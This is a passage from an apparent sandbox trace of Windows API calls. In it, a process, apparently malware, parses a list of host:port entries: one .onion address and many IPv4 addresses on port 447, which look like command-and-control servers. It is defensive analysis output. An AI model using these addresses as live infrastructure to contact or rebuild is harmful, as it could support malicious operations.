	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffd68) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffd68) returned 1
	[0209.132] StrStrIW (lpFirst="cd4fhnyg2337dgxk.onion:448", lpSrch=":") returned=":448"
	[0209.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.132] lstrcpynW (in: lpString1=0x22a6260, lpString2="cd4fhnyg2337dgxk.onion:448", iMaxLength=23 | out: lpString1="cd4fhnyg2337dgxk.onion") returned="cd4fhnyg2337dgxk.onion"
	[0209.132] StrStrIW (lpFirst="448", lpSrch=":") returned 0x0
	[0209.132] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa98, Size=0x10) returned 0x22ffa80
	[0209.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.132] lstrcpynW (in: lpString1=0x22ffa98, lpString2="448", iMaxLength=4 | out: lpString1="448") returned="448"
	[0209.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a62d0
	[0209.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7278) returned 1
	[0209.132] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732bc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0209.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.132] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732bc0, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=17 | out: lpWideCharStr="194.87.93.18:447") returned 17
	[0209.132] StrStrIW (lpFirst="194.87.93.18:447", lpSrch=":") returned=":447"
	[0209.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.133] lstrcpynW (in: lpString1=0x2732e18, lpString2="194.87.93.18:447", iMaxLength=13 | out: lpString1="194.87.93.18") returned="194.87.93.18"
	[0209.133] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.133] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa80, Size=0x10) returned 0x22ffa98
	[0209.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.133] lstrcpynW (in: lpString1=0x22ffa80, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e40
	[0209.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.133] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0209.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.133] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732be8, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=18 | out: lpWideCharStr="37.44.212.204:447") returned 18
	[0209.133] StrStrIW (lpFirst="37.44.212.204:447", lpSrch=":") returned=":447"
	[0209.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.133] lstrcpynW (in: lpString1=0x2732e18, lpString2="37.44.212.204:447", iMaxLength=14 | out: lpString1="37.44.212.204") returned="37.44.212.204"
	[0209.133] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.133] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa98, Size=0x10) returned 0x22ffa80
	[0209.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.133] lstrcpynW (in: lpString1=0x22ffa98, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e68
	[0209.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.133] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0209.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.133] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732c10, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=17 | out: lpWideCharStr="5.188.108.22:447") returned 17
	[0209.134] StrStrIW (lpFirst="5.188.108.22:447", lpSrch=":") returned=":447"
	[0209.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.134] lstrcpynW (in: lpString1=0x2732e18, lpString2="5.188.108.22:447", iMaxLength=13 | out: lpString1="5.188.108.22") returned="5.188.108.22"
	[0209.134] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.134] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa80, Size=0x10) returned 0x22ffa98
	[0209.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.134] lstrcpynW (in: lpString1=0x22ffa80, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e90
	[0209.134] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.134] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.134] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.134] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.134] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0209.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.134] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732c38, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=20 | out: lpWideCharStr="164.132.138.141:447") returned 20
	[0209.134] StrStrIW (lpFirst="164.132.138.141:447", lpSrch=":") returned=":447"
	[0209.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.135] lstrcpynW (in: lpString1=0x2732e18, lpString2="164.132.138.141:447", iMaxLength=16 | out: lpString1="164.132.138.141") returned="164.132.138.141"
	[0209.135] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.135] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa98, Size=0x10) returned 0x22ffa80
	[0209.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.135] lstrcpynW (in: lpString1=0x22ffa98, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732eb8
	[0209.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.135] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0209.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.135] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732c60, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=18 | out: lpWideCharStr="185.125.46.41:447") returned 18
	[0209.135] StrStrIW (lpFirst="185.125.46.41:447", lpSrch=":") returned=":447"
	[0209.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.135] lstrcpynW (in: lpString1=0x2732e18, lpString2="185.125.46.41:447", iMaxLength=14 | out: lpString1="185.125.46.41") returned="185.125.46.41"
	[0209.135] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.135] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa80, Size=0x10) returned 0x22ffa98
	[0209.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.135] lstrcpynW (in: lpString1=0x22ffa80, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732ee0
	[0209.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.135] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732c88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0209.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.135] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732c88, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=19 | out: lpWideCharStr="195.123.245.83:447") returned 19
	[0209.135] StrStrIW (lpFirst="195.123.245.83:447", lpSrch=":") returned=":447"
	[0209.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.136] lstrcpynW (in: lpString1=0x2732e18, lpString2="195.123.245.83:447", iMaxLength=15 | out: lpString1="195.123.245.83") returned="195.123.245.83"
	[0209.136] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.136] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa98, Size=0x10) returned 0x22ffa80
	[0209.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.136] lstrcpynW (in: lpString1=0x22ffa98, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732f08
	[0209.136] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.136] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.136] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.136] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.136] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732cb0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0209.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.136] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732cb0, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=20 | out: lpWideCharStr="195.123.238.184:447") returned 20
	[0209.136] StrStrIW (lpFirst="195.123.238.184:447", lpSrch=":") returned=":447"
	[0209.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.136] lstrcpynW (in: lpString1=0x2732e18, lpString2="195.123.238.184:447", iMaxLength=16 | out: lpString1="195.123.238.184") returned="195.123.238.184"
	[0209.136] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.136] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa80, Size=0x10) returned 0x22ffa98
	[0209.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.136] lstrcpynW (in: lpString1=0x22ffa80, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732f30
	[0209.136] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.137] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.137] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.137] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.137] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732cd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0209.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.137] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732cd8, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=18 | out: lpWideCharStr="137.74.151.56:447") returned 18
	[0209.137] StrStrIW (lpFirst="137.74.151.56:447", lpSrch=":") returned=":447"
	[0209.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.137] lstrcpynW (in: lpString1=0x2732e18, lpString2="137.74.151.56:447", iMaxLength=14 | out: lpString1="137.74.151.56") returned="137.74.151.56"
	[0209.137] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.137] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa98, Size=0x10) returned 0x22ffa80
	[0209.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.137] lstrcpynW (in: lpString1=0x22ffa98, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732f58
	[0209.137] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.137] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.137] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.137] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.137] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732d00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0209.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.137] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732d00, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=17 | out: lpWideCharStr="81.177.6.170:447") returned 17
	[0209.137] StrStrIW (lpFirst="81.177.6.170:447", lpSrch=":") returned=":447"
	[0209.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.138] lstrcpynW (in: lpString1=0x2732e18, lpString2="81.177.6.170:447", iMaxLength=13 | out: lpString1="81.177.6.170") returned="81.177.6.170"
	[0209.138] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.138] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa80, Size=0x10) returned 0x22ffa98
	[0209.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.138] lstrcpynW (in: lpString1=0x22ffa80, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732f80
	[0209.138] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.138] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.138] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.138] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.138] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732d28, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0209.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.138] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732d28, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=17 | out: lpWideCharStr="92.38.135.44:447") returned 17
	[0209.138] StrStrIW (lpFirst="92.38.135.44:447", lpSrch=":") returned=":447"
	[0209.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.138] lstrcpynW (in: lpString1=0x2732e18, lpString2="92.38.135.44:447", iMaxLength=13 | out: lpString1="92.38.135.44") returned="92.38.135.44"
	[0209.138] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.138] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa98, Size=0x10) returned 0x22ffa80
	[0209.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.138] lstrcpynW (in: lpString1=0x22ffa98, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732fa8
	[0209.138] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.138] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.138] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.138] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.138] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0209.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.138] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732d50, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=17 | out: lpWideCharStr="195.54.163.5:447") returned 17
	[0209.138] StrStrIW (lpFirst="195.54.163.5:447", lpSrch=":") returned=":447"
	[0209.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.139] lstrcpynW (in: lpString1=0x2732e18, lpString2="195.54.163.5:447", iMaxLength=13 | out: lpString1="195.54.163.5") returned="195.54.163.5"
	[0209.139] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.139] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa80, Size=0x10) returned 0x22ffa98
	[0209.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.139] lstrcpynW (in: lpString1=0x22ffa80, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732fd0
	[0209.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.139] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0209.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.139] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732d78, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=20 | out: lpWideCharStr="164.132.138.134:447") returned 20
	[0209.139] StrStrIW (lpFirst="164.132.138.134:447", lpSrch=":") returned=":447"
	[0209.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.139] lstrcpynW (in: lpString1=0x2732e18, lpString2="164.132.138.134:447", iMaxLength=16 | out: lpString1="164.132.138.134") returned="164.132.138.134"
	[0209.139] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.139] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa98, Size=0x10) returned 0x22ffa80
	[0209.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.139] lstrcpynW (in: lpString1=0x22ffa98, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732ff8
	[0209.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.139] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732da0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0209.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.140] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732da0, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=18 | out: lpWideCharStr="185.142.99.45:447") returned 18
	[0209.140] StrStrIW (lpFirst="185.142.99.45:447", lpSrch=":") returned=":447"
	[0209.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.140] lstrcpynW (in: lpString1=0x2732e18, lpString2="185.142.99.45:447", iMaxLength=14 | out: lpString1="185.142.99.45") returned="185.142.99.45"
	[0209.140] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.140] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa80, Size=0x10) returned 0x22ffa98
	[0209.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.140] lstrcpynW (in: lpString1=0x22ffa80, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733020
